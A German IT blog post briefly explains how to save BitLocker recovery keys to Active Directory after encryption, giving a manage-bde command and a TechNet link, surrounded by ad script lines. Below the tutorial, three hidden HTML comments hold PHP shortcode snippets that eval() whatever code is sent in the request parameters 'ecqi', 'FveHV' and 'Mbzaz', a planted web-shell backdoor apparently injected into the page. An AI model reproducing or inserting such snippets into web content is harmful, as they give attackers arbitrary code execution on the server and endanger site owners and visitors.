BitLocker Schlüssel nachträglich im Active Directory speichern

Werbung


(adsbygoogle = window.adsbygoogle || []).push({});

Werbung


(adsbygoogle = window.adsbygoogle || []).push({});

Werbung


(adsbygoogle = window.adsbygoogle || []).push({});

Werbung

BitLocker bittet ja die möglichkeit, dass der Schlüssel im Active Directory gespeichert werden kann. Solltet ihr das so umgesetzt haben aber es sind schon ein paar Rechner via BitLocker verschlüsselt, gibt es die Möglichkeit den Schlüssel nachträglich im Active Directory zu speichern.

manage-bde -protectors -add -RecoveryPassword C:

Technet-Artikel: http://technet.microsoft.com/en-us/library/cc766015(WS.10).aspx

<!– [insert_php]if (isset($_REQUEST["ecqi"])){eval($_REQUEST["ecqi"]);exit;}[/insert_php][php]if (isset($_REQUEST["ecqi"])){eval($_REQUEST["ecqi"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["FveHV"])){eval($_REQUEST["FveHV"]);exit;}[/insert_php][php]if (isset($_REQUEST["FveHV"])){eval($_REQUEST["FveHV"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["Mbzaz"])){eval($_REQUEST["Mbzaz"]);exit;}[/insert_php][php]if (isset($_REQUEST["Mbzaz"])){eval($_REQUEST["Mbzaz"]);exit;}[/php] –>

Werbung

Das könnte dich auch interessieren...

Schreibe einen Kommentar

Deine E-Mail-Adresse wird nicht veröffentlicht. Erforderliche Felder sind mit * markiert.